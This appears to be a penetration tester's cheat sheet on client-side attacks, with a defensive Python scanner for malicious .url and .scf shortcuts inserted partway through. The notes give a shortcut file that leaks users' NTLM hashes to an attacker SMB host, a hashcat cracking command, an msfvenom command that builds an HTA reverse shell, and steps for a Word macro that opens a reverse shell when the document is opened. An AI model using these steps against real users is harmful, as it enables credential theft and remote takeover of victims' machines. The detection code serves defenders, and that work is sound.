Client Side Attacks
URL Attack (Formerly SCF)
If there is a location a user is reading files from, like FTP or SMB, use a file like this to grab their hash with SMBServer.py or Responder once they click it. Then crack it with Hashcat.
smbserver.py share . -smb2support

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.56.128\%USERNAME%.icon
IconIndex=1

Create it as a .txt and save as .url before sending or putting in location for user
hashcat -m 5600 hash.txt /root/rockyou.txt --force
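Seen from the defending side, the same file format can be hunted for on writable shares. This added example (not part of the original notes) flags .url and .scf files whose IconFile, URL or WorkingDirectory value names a remote host; the function names and sample strings are assumptions constructed for illustration.

```python
import os
import re

# Keys whose value Explorer may resolve as a path when it renders the shortcut.
PATH_KEYS = {"iconfile", "url", "workingdirectory"}
# \\host\... (but not the local \\?\ and \\.\ prefixes) or file://host/...
REMOTE = re.compile(r"^(?:\\\\(?![?.]\\)[^\\]+\\|file://[^/]+/)", re.IGNORECASE)

# Constructed samples: the shortcut shown on this page, and a harmless local one.
SUSPICIOUS = (
    "[InternetShortcut]\n"
    "URL=blah\n"
    "WorkingDirectory=blah\n"
    "IconFile=\\\\192.168.56.128\\%USERNAME%.icon\n"
    "IconIndex=1\n"
)
BENIGN = "[InternetShortcut]\nIconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=1\n"


def remote_references(text):
    """Return (key, value) pairs in shortcut text that name a remote host."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if sep and key.lower() in PATH_KEYS and REMOTE.match(value):
            hits.append((key, value))
    return hits


def scan_share(root):
    """Walk a directory tree; map each flagged .url/.scf file to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".url", ".scf")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = remote_references(fh.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    print(remote_references(SUSPICIOUS))
    print(remote_references(BENIGN))
```

Point `scan_share` at a mounted copy of the file share; any hit is a shortcut that makes a client authenticate to the named host when the folder is rendered.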
HTA
HTML Applications that will get executed by mshta.exe if the user is on IE or Edge (with Edge the user has more security notifications to click through)
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f hta-psh -o shell.hta

Host the file with a web server or upload it in a known place where the user will open
Macro
Create a macro in a Word doc that will auto-launch on opening to give a reverse shell
Can use the previous msfvenom command to copy a PowerShell payload or just use revshells.com
Split the PowerShell payload as you aren't allowed the full amount of characters on a single line
Then add the payload into the macro